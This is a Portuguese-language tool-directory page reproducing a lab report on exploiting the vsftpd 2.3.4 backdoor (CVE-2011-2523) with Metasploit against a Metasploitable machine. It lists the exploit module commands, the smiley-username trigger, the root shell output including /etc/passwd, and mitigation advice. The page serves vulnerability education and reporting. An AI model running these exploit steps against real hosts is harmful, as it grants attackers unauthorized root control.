Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

Avaliação de vulnerabilidade e exploração do vsftpd 2.3.4 (CVE-2011-2523) usando Metasploit. Relatório completo e prova de acesso root incluídos.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver RepositórioSite
2há 1 anoAinda não revisado

💥 Relatório de Exploração de Backdoor vsftpd 2.3.4

Exploração de uma vulnerabilidade conhecida em vsftpd 2.3.4 usando Metasploit.

📌 Detalhes do Alvo

  • IP do Alvo: 192.168.150.133
  • Serviço: FTP
  • Versão Vulnerável: vsftpd 2.3.4
  • Módulo de Exploração: exploit/unix/ftp/vsftpd_234_backdoor
  • Payload: Shell de comando (TCP)

🔍 Resumo da Vulnerabilidade

vsftpd 2.3.4 contém um backdoor malicioso que abre um shell de comando na porta 6200 quando um nome de utilizador especialmente criado (terminando em :)) é recebido.

CVE: CVE-2011-2523


🚀 Passos de Exploração

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 Acesso ao Shell Obtido:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 Impacto

O acesso ao shell root dá ao atacante controlo total sobre o sistema alvo — incluindo escalonamento de privilégios, movimento lateral, exfiltração de dados e acesso persistente.


✅ Recomendação

  • Não use vsftpd 2.3.4.
  • Atualize para uma versão segura e suportada.
  • Restrinja o acesso externo ao FTP.
  • Monitore tráfego suspeito na porta 6200.

📄 Relatório

📝 Relatório PDF completo disponível neste repositório: vsftpd-exploit-report.pdf


📚 Referências

  • Rapid7 Module Info
  • CVE-2011-2523 - NVD

👨‍💻 Autor

Feito com 🔥 por vedpakhare

Baixar ferramenta